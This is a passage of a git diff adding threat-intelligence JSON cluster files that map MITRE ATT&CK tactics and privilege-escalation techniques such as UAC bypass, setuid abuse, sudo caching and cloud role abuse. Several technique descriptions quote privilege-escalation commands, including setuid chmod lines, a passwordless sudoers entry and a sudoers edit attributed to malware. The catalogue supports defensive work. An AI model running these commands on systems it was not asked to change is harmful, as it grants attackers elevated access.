"351a3ac7-bf0f-5dc1-b090-5a3d3586f31d", + "type": "uses" + }, + { + "dest-uuid": "852bc9a9-865f-59cd-9e81-bec6e8aa8b78", + "type": "uses" + } + ], + "uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "value": "Lateral Movement" + }, + { + "description": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.", + "meta": { + "ordinal_position": 11, + "source": "MITRE", + "tactic_attack_id": "TA0009", + "tags": [] + }, + "related": [ + { + "dest-uuid": "3042a254-a2a9-4cb9-9939-087a24c64907", + "type": "uses" + }, + { + "dest-uuid": "4462ce9d-0a5a-427d-8160-7b307b50cfbd", + "type": "uses" + }, + { + "dest-uuid": "d98dbf30-c454-42ff-a9f3-2cd3319cc0d9", + "type": "uses" + }, + { + "dest-uuid": "7f1798b5-b159-441b-a5ef-3b5c706e1699", + "type": "uses" + }, + { + "dest-uuid": "97ef6135-47d4-4b91-8783-c0b5f331340e", + "type": "uses" + }, + { + "dest-uuid": "8ac6952d-5add-4cbc-ad39-44943ed3459b", + "type": "uses" + }, + { + "dest-uuid": "2be5c67a-edae-4083-8b6d-f99eaa622ed4", + "type": "uses" + }, + { + "dest-uuid": "41da2363-af05-46b8-990e-2cc749b5aac8", + "type": "uses" + }, + { + "dest-uuid": "3569b783-1be5-414b-adb9-42c47ceee1cc", + "type": "uses" + }, + { + "dest-uuid": "ae3f9f0f-af66-424c-bcc8-4fdbd7ef9766", + "type": "uses" + }, + { + "dest-uuid": "8e32b6ed-58b1-4708-8b86-bd29c3a544d2", + "type": "uses" + }, + { + "dest-uuid": "9a388756-9de0-45ea-9820-810443733789", + "type": "uses" + }, + { + "dest-uuid": "107ad6c5-79b1-468c-9519-1578bee2ac49", + "type": "uses" + }, + { + "dest-uuid": "e8f90b73-2e59-4643-a274-78b85b8d9f88", + "type": "uses" + }, + { + "dest-uuid": "77069b3f-9e42-4f1b-894f-8df568233df2", + "type": "uses" + }, + { + "dest-uuid": "cf76b79c-8226-4137-b3dd-8f516611b928", + "type": "uses" + }, + { + "dest-uuid": "c0e4f97b-f651-493f-9636-6ac2f6fb46fb", + "type": "uses" + }, + { + "dest-uuid": "ccf06b4a-bc33-4db1-bc66-74a0a7c31451", + "type": "uses" + }, + { + "dest-uuid": "0d5a5921-f643-4032-9a4a-0bb693822c21", + "type": "uses" + }, + { + "dest-uuid": "ebd3f870-c513-4fb0-b133-15ffc1f91db2", + "type": "uses" + }, + { + "dest-uuid": "b57c5554-5a46-42cd-be7e-4206f79ef424", + "type": "uses" + }, + { + "dest-uuid": "52dabfcc-b7a4-4334-9014-ab9d82f5527b", + "type": "uses" + }, + { + "dest-uuid": "b44a263f-76b2-4a1f-baeb-dd285974eca6", + "type": "uses" + }, + { + "dest-uuid": "34674b83-86a7-4ad9-8b05-49b505aa5ef0", + "type": "uses" + }, + { + "dest-uuid": "0c81e13a-3608-4171-8075-9f70b2934028", + "type": "uses" + }, + { + "dest-uuid": "3cc64d61-7922-4e08-98ff-b76cb2173830", + "type": "uses" + }, + { + "dest-uuid": "59db734e-9edb-4c92-b2ca-a72fe1e08ac7", + "type": "uses" + }, + { + "dest-uuid": "ef4ef020-5cd1-4859-902b-f207828a1281", + "type": "uses" + }, + { + "dest-uuid": "40ac9bae-173e-467c-80f2-0c1513fc874d", + "type": "uses" + }, + { + "dest-uuid": "875c5aa3-6ab1-4717-9503-9818ccbad98a", + "type": "uses" + }, + { + "dest-uuid": "5de59320-1471-4715-99c4-eda2f7996d07", + "type": "uses" + }, + { + "dest-uuid": "5ee96331-a7b7-4c32-a8f1-3fb164078f5f", + "type": "uses" + }, + { + "dest-uuid": "03ef726b-ac65-4e23-8130-9d299a3f458a", + "type": "uses" + }, + { + "dest-uuid": "fe595943-f264-4d05-a8c7-7afc8985bfc3", + "type": "uses" + }, + { + "dest-uuid": "08a73f37-a04e-46be-9409-b330cbe291b4", + "type": "uses" + }, + { + "dest-uuid": "8510638d-5be4-4986-a11c-dcbdc729a50f", + "type": "uses" + }, + { + "dest-uuid": "28fd13d1-b555-47fa-9d47-caf6b1367ace", + "type": "uses" + } + ], + "uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "value": "Collection" + }, + { + "description": "The adversary is trying to communicate with compromised systems to control them.\n\nCommand and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.", + "meta": { + "ordinal_position": 12, + "source": "MITRE", + "tactic_attack_id": "TA0011", + "tags": [] + }, + "related": [ + { + "dest-uuid": "f0dd515b-51cf-4853-a20c-02226d099ee0", + "type": "uses" + }, + { + "dest-uuid": "972f0311-aec5-4fb5-bc5b-504c3f0cc95c", + "type": "uses" + }, + { + "dest-uuid": "b0be2e07-e4b4-4f1a-8fce-c7a1e820a817", + "type": "uses" + }, + { + "dest-uuid": "5c6c3492-5dbc-43ee-a3f2-ba1976d3b379", + "type": "uses" + }, + { + "dest-uuid": "ac7b9775-8323-49cb-8fef-3cef972f11ac", + "type": "uses" + }, + { + "dest-uuid": "abae30c8-c6b0-46ae-b464-44b66412065f", + "type": "uses" + }, + { + "dest-uuid": "8a7afe43-b814-41b3-8bd8-e1301b8ba5b4", + "type": "uses" + }, + { + "dest-uuid": "acf828f4-7e7e-43e1-bf15-ceab42021430", + "type": "uses" + }, + { + "dest-uuid": "c2cf211a-9676-4922-a386-69697ab4934a", + "type": "uses" + }, + { + "dest-uuid": "bd677092-d197-4230-b94a-438cb24260fd", + "type": "uses" + }, + { + "dest-uuid": "350fd3f9-2d62-498f-be62-fc4b9907ff02", + "type": "uses" + }, + { + "dest-uuid": "0783c499-1564-4062-addc-f1ff86ef4e59", + "type": "uses" + }, + { + "dest-uuid": "4c2c7469-0dbc-410f-891b-1040d4f2ff0b", + "type": "uses" + }, + { + "dest-uuid": "ba6a869a-c870-4be6-bc08-e078f0efdc3b", + "type": "uses" + }, + { + "dest-uuid": "987ad3da-9423-4fe0-a52b-b931c0b8b95f", + "type": "uses" + }, + { + "dest-uuid": "a729feee-8e21-444e-8eea-2ec595b09931", + "type": "uses" + }, + { + "dest-uuid": "e9cc000d-174e-4e6c-9513-a0c000061700", + "type": "uses" + }, + { + "dest-uuid": "e54bdb49-6039-4048-9be6-657a7ff3e071", + "type": "uses" + }, + { + "dest-uuid": "34a112db-c61d-4ea2-872f-de3fc1af87a3", + "type": "uses" + }, + { + "dest-uuid": "a4f21b08-bf5b-4ba3-af69-cce01a467859", + "type": "uses" + }, + { + "dest-uuid": "9ff640ed-572e-4adc-bdc6-234a9e8ef36b", + "type": "uses" + }, + { + "dest-uuid": "fa05c148-56a0-43ae-b8e4-2d4e91641400", + "type": "uses" + }, + { + "dest-uuid": "57f95410-5735-43ae-9fec-8b628a7df985", + "type": "uses" + }, + { + "dest-uuid": "36850d17-a7d5-41ac-aa89-040b9c0b2b3f", + "type": "uses" + }, + { + "dest-uuid": "0e704680-c930-42a7-9caa-5802b8cb2c48", + "type": "uses" + }, + { + "dest-uuid": "f8a4c7ee-074b-4bfc-95be-43d91756b73c", + "type": "uses" + }, + { + "dest-uuid": "ce822cce-f7f1-4753-bff1-12e5bef66d53", + "type": "uses" + }, + { + "dest-uuid": "4aed5968-6380-47d2-bbd7-3a4d959089e1", + "type": "uses" + }, + { + "dest-uuid": "eb15320a-cd24-45b2-b23f-05ef8daf1039", + "type": "uses" + }, + { + "dest-uuid": "12a5e66d-6a21-4e75-a201-97235698d67d", + "type": "uses" + }, + { + "dest-uuid": "7d8af4f3-7d8e-4ef2-b828-40a910fc6188", + "type": "uses" + }, + { + "dest-uuid": "0848222e-ddc2-489e-8ea4-e19634f6af34", + "type": "uses" + }, + { + "dest-uuid": "9a21ec7b-9714-4073-9bf3-4df41995c698", + "type": "uses" + }, + { + "dest-uuid": "4499ce34-9871-4879-883c-19ddb940f242", + "type": "uses" + }, + { + "dest-uuid": "2735f8d1-0e46-4cd7-bfbb-78941bb266fd", + "type": "uses" + }, + { + "dest-uuid": "be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1", + "type": "uses" + }, + { + "dest-uuid": "8b744bfc-6bfb-45c5-8bb8-5b736ce7e634", + "type": "uses" + }, + { + "dest-uuid": "faeec22d-dff4-496f-9c7e-14c4f2c8d054", + "type": "uses" + }, + { + "dest-uuid": "584d1c76-7da9-4374-87df-e622d78fc270", + "type": "uses" + }, + { + "dest-uuid": "3f95e4f2-cd4a-502c-a12a-becb8d28440c", + "type": "uses" + } + ], + "uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "value": "Command and Control" + }, + { + "description": "The adversary is trying to steal data.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.", + "meta": { + "ordinal_position": 13, + "source": "MITRE", + "tactic_attack_id": "TA0010", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66768217-acdd-4b52-902f-e29483630ad6", + "type": "uses" + }, + { + "dest-uuid": "ea0557cd-94bc-48cf-9c3b-293c40986464", + "type": "uses" + }, + { + "dest-uuid": "d8541e2d-6bdd-4ec0-95c4-c0f657502d5f", + "type": "uses" + }, + { + "dest-uuid": "38cfe608-a7e3-4e4f-9e2d-6a6ab14946f9", + "type": "uses" + }, + { + "dest-uuid": "26abc19f-5968-45f1-aa1f-f35863a2f804", + "type": "uses" + }, + { + "dest-uuid": "848e3552-e89d-4981-a5a5-eaf610e6eb37", + "type": "uses" + }, + { + "dest-uuid": "c2fc2776-e674-46ff-8b8d-ecc90b8b1c26", + "type": "uses" + }, + { + "dest-uuid": "c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1", + "type": "uses" + }, + { + "dest-uuid": "b27b273b-77e7-4243-8b48-a735857c0708", + "type": "uses" + }, + { + "dest-uuid": "89203cae-d3f1-4eef-9b5a-29042eb05d19", + "type": "uses" + }, + { + "dest-uuid": "192d25ea-bae1-48e4-88de-e0acd481ab88", + "type": "uses" + }, + { + "dest-uuid": "f424dade-21f3-4269-9940-ce64d93b97c4", + "type": "uses" + }, + { + "dest-uuid": "ce886c55-17ab-4c1c-90dc-3aa93e69bdb4", + "type": "uses" + }, + { + "dest-uuid": "dc98c882-8fba-4a10-bc6f-43088edb87af", + "type": "uses" + }, + { + "dest-uuid": "ab4f22d6-465f-4a16-8a40-693f2234c4ac", + "type": "uses" + }, + { + "dest-uuid": "36e0e8c0-ed8c-42b5-8bbf-b7cb322bc26f", + "type": "uses" + }, + { + "dest-uuid": "27041aa4-13e7-4d84-b1c7-02047beb5534", + "type": "uses" + }, + { + "dest-uuid": "8b6743e7-e856-5772-8b38-2c002602b365", + "type": "uses" + }, + { + "dest-uuid": "4c34fe8b-ea13-55f9-9a2f-5948e2a2ecca", + "type": "uses" + } + ], + "uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "value": "Exfiltration" + }, + { + "description": "The adversary is trying to manipulate, interrupt, or destroy your systems and data.\n \nImpact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.", + "meta": { + "ordinal_position": 14, + "source": "MITRE", + "tactic_attack_id": "TA0040", + "tags": [] + }, + "related": [ + { + "dest-uuid": "14a944d3-ab95-40d8-b069-ccc4824ef46d", + "type": "uses" + }, + { + "dest-uuid": "66657af9-83f7-4a54-b41b-301bfcdae866", + "type": "uses" + }, + { + "dest-uuid": "26db57d5-ce6f-4487-a8a8-b4af1c4b6406", + "type": "uses" + }, + { + "dest-uuid": "b05b5092-60f8-4324-aee3-7522753439ac", + "type": "uses" + }, + { + "dest-uuid": "49ef3482-7b75-4097-b9a6-6c9cb99d865c", + "type": "uses" + }, + { + "dest-uuid": "ea2b3980-05fd-41a3-8ab9-3106e833c821", + "type": "uses" + }, + { + "dest-uuid": "d693ca8a-dacf-439e-a16b-5f6b3406a21d", + "type": "uses" + }, + { + "dest-uuid": "e27c5756-f43e-424f-af62-b21e8b304e5d", + "type": "uses" + }, + { + "dest-uuid": "2109de05-5b45-4519-94a2-6c04f7d88286", + "type": "uses" + }, + { + "dest-uuid": "3ec6bb34-4134-40c3-8b67-c0aeceae4471", + "type": "uses" + }, + { + "dest-uuid": "66cf4803-aec1-4396-afc1-28bc27dd8b2c", + "type": "uses" + }, + { + "dest-uuid": "03619027-8a54-4cb2-8f1d-38d476edbdd8", + "type": "uses" + }, + { + "dest-uuid": "9a21c7c7-cf8e-4f05-b196-86ec39653e3b", + "type": "uses" + }, + { + "dest-uuid": "546a3318-0e03-4b22-95f5-c02ff69a4ebf", + "type": "uses" + }, + { + "dest-uuid": "b77f03e8-f7d0-4d0f-8b79-4642d0fe2709", + "type": "uses" + }, + { + "dest-uuid": "847fcc8a-e74d-41e2-9f05-8d79d990cc04", + "type": "uses" + }, + { + "dest-uuid": "f0c36d24-263c-4811-8784-f716c77ec6b3", + "type": "uses" + }, + { + "dest-uuid": "8b0caea0-602e-4117-8322-b125150f5c2a", + "type": "uses" + }, + { + "dest-uuid": "d10c4a15-aeaa-4630-a7a3-3373c89a584f", + "type": "uses" + }, + { + "dest-uuid": "70365fab-8531-4a0e-b147-7cabdfdef243", + "type": "uses" + }, + { + "dest-uuid": "e5016c2b-85fe-4e6b-917d-0dd5b441cc34", + "type": "uses" + }, + { + "dest-uuid": "e6c14a7b-1fb8-4557-83e7-7f5b89717311", + "type": "uses" + }, + { + "dest-uuid": "559c647a-7759-4943-856d-dc717b5a443e", + "type": "uses" + }, + { + "dest-uuid": "d207c03b-fbe7-420e-a053-339f4650c043", + "type": "uses" + }, + { + "dest-uuid": "761fa7fa-d7e1-4796-85b3-5cd37d55dffa", + "type": "uses" + }, + { + "dest-uuid": "24787dca-6afd-4ab3-ab6c-32e9486ec418", + "type": "uses" + }, + { + "dest-uuid": "b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9", + "type": "uses" + } + ], + "uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "value": "Impact" + } + ] +} diff --git a/clusters/tidal-technique.json b/clusters/tidal-technique.json new file mode 100644 index 0000000..2140816 --- /dev/null +++ b/clusters/tidal-technique.json @@ -0,0 +1,12937 @@ +{ + "authors": "Tidal", + "category": "Technique", + "description": "Tidal Technique Cluster", + "name": "Tidal Technique", + "source": "Tidal", + "type": "technique", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "values": [ + { + "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.[[TechNet How UAC Works](https://app.tidalcyber.com/references/bbf8d1a3-115e-4bc8-be43-47ce3b295d45)]\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) objects without prompting the user through the UAC notification box.[[TechNet Inside UAC](https://app.tidalcyber.com/references/dea47af6-677a-4625-8664-adf0e6839c9f)][[MSDN COM Elevation](https://app.tidalcyber.com/references/898df7c7-4f19-40cb-a216-7b0f6c6155b3)] An example of this is use of [Rundll32](https://app.tidalcyber.com/technique/5652575d-cdb9-44ef-9c32-fff038f15444) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[[Davidson Windows](https://app.tidalcyber.com/references/49af01f2-06c5-4b21-9882-901ad828ee28)]\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods[[Github UACMe](https://app.tidalcyber.com/references/7006d59d-3b61-4030-a680-5dac52133722)] that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.[[enigma0x3 Fileless UAC Bypass](https://app.tidalcyber.com/references/74b16ca4-9494-4f10-97c5-103a8521818f)][[Fortinet Fareit](https://app.tidalcyber.com/references/d06223d7-2d86-41c6-af23-50865a1810c0)]\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.[[SANS UAC Bypass](https://app.tidalcyber.com/references/824739ac-633a-40e0-bb01-2bfd43714d67)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1548.002" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "5e1499a1-f1ad-4929-84e1-5d33c371c02d", + "value": "Bypass User Account Control" + }, + { + "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.[[AppleDocs AuthorizationExecuteWithPrivileges](https://app.tidalcyber.com/references/7b8875e8-5b93-4d49-a12b-2683bab2ba6e)] The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.[[Death by 1000 installers; it's all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)][[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)][[OSX Coldroot RAT](https://app.tidalcyber.com/references/5ee3a92c-df33-4ecd-b21e-7b9a4f6de227)] This technique may be combined with [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to trick the user into granting escalated privileges to malicious code.[[Death by 1000 installers; it's all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)][[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)] This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.[[Death by 1000 installers; it's all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1548.004" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "fd6b86c5-535b-4532-a6d8-a57a6fb04c18", + "value": "Elevated Execution with Prompt" + }, + { + "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.[[setuid man page](https://app.tidalcyber.com/references/c07e9d6c-18f2-4246-a265-9bec7d833bba)] Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://app.tidalcyber.com/technique/5c6687f6-3539-4268-a6a4-2b98fdeac0fb)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)] This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.[[GTFOBins Suid](https://app.tidalcyber.com/references/0b7d8e81-da8e-4f6a-a1b7-4ed81e441b4d)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1548.001" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "e939bc27-a2cc-4278-be9b-a794c34aacbc", + "value": "Setuid and Setgid" + }, + { + "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"[[sudo man page 2018](https://app.tidalcyber.com/references/659d4302-d4cf-41af-8007-aa1da0208aa0)] Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.[[OSX.Dok Malware](https://app.tidalcyber.com/references/71d65081-dada-4a69-94c5-f1d8e4e151c1)] Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers.[[cybereason osx proton](https://app.tidalcyber.com/references/9c43d646-9ac2-43b5-80b6-9e69dcb57617)] In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1548.003" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "e082687f-d403-4246-987b-ad5f12911e4b", + "value": "Sudo and Sudo Caching" + }, + { + "description": "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. \n\nJust-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.[[Google Cloud Just in Time Access 2023](https://app.tidalcyber.com/references/797c6051-9dff-531b-8438-d306bdf46720)][[Azure Just in Time Access 2023](https://app.tidalcyber.com/references/ee35e13f-ca39-5faf-81ae-230d33329a28)]\n\nAccount impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.[[Google Cloud Service Account Authentication Roles](https://app.tidalcyber.com/references/525a8afc-64e9-5cc3-9c56-95da9811da0d)] In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.[[Microsoft Impersonation and EWS in Exchange](https://app.tidalcyber.com/references/d7755dbd-0b38-5776-b63a-d792a4d027a4)] \n\nMany cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.[[AWS PassRole](https://app.tidalcyber.com/references/01e0c198-dd59-5dd1-b632-73cb316eafe0)][[Google Cloud Service Account Authentication Roles](https://app.tidalcyber.com/references/525a8afc-64e9-5cc3-9c56-95da9811da0d)]\n\nWhile users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.[[Rhino Google Cloud Privilege Escalation](https://app.tidalcyber.com/references/55173e12-9edc-5685-ac0b-acd51617cc6e)][[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]\n\n**Note:** this technique is distinct from [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1548.005" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "448dc009-2d3f-5480-aba3-0d80dc4336cd", + "value": "Temporary Elevated Cloud Access" + }, + { + "description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.", + "meta": { + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Office 365", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "5e1499a1-f1ad-4929-84e1-5d33c371c02d", + "type": "similar" + }, + { + "dest-uuid": "fd6b86c5-535b-4532-a6d8-a57a6fb04c18", + "type": "similar" + }, + { + "dest-uuid": "e939bc27-a2cc-4278-be9b-a794c34aacbc", + "type": "similar" + }, + { + "dest-uuid": "e082687f-d403-4246-987b-ad5f12911e4b", + "type": "similar" + }, + { + "dest-uuid": "448dc009-2d3f-5480-aba3-0d80dc4336cd", + "type": "similar" + } + ], + "uuid": "ac7d9875-d18b-48f6-93e6-47c565f9526b", + "value": "Abuse Elevation Control Mechanism" + }, + { + "description": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.[[Microsoft RunAs](https://app.tidalcyber.com/references/af05c12e-f9c6-421a-9a5d-0797c01ab2dc)]\n\nCreating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) or created via [Make and Impersonate Token](https://app.tidalcyber.com/technique/561da0ae-4ebc-4356-a954-338249cac31a) before being used to create a process.\n\nWhile this technique is distinct from [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1134.002" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": 